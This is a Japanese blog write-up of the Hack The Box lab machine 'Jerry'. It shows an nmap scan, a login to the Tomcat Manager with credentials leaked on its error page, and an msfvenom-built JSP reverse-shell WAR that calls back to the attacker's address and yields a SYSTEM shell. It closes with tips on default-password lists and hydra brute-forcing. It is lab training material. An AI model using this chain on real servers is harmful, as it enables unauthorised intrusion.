【Hack the Box write-up】Jerry

May 22, 2020

はじめに

筆者は Hack the Box 初心者です。何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です。スクリーンショット 2020-05-22 14.54.05.png

easy の中でもかなり簡単な部類です。（Hack the Box 久々なのでリハビリがてらということで…

nmap

kali@kali:~$ nmap -sV -sC 10.10.10.95 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 01:49 EDT
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.78 seconds

8080 ポート見てみる

スクリーンショット 2020-05-22 16.58.15.png

Manager App が怪しそうなので見てみます、Basic 認証が出てきますが適当に打ち込んで外しました。スクリーンショット 2020-05-22 17.06.37.png エラーページになんか user と password っぽいの見えてね…？

ということでキャッシュ削除して見えてた user/pass で入るとスクリーンショット 2020-05-22 17.09.39.png

入れました。

msfvenom

スクリーンショット 2020-05-22 20.19.44.png

war をあげれそうなので msfvenom で payload 生成します

kali@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1212 -f war > paypay.war
Payload size: 1087 bytes
Final size of war file: 1087 bytes

これを upload します

nc で待ち受けると…

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

一気に admin で取れちゃいました

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,602,919,424 bytes free
C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"
more "2 for the price of 1.txt"
user.txt
********************************

root.txt
********************************

flag も 2 つ一気に取れちゃいましたね

終わりに

流石に簡単でした。今月の目標はできる限り metasploit を使わないです

他の writeup みてて参考になりそうだったもの

tomcat の defaultpasslist https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt hydra とか使えば 403 ページで user/pass 見えてなくても（or 見えてることに気づかなくても）サクッと bruteforce できそう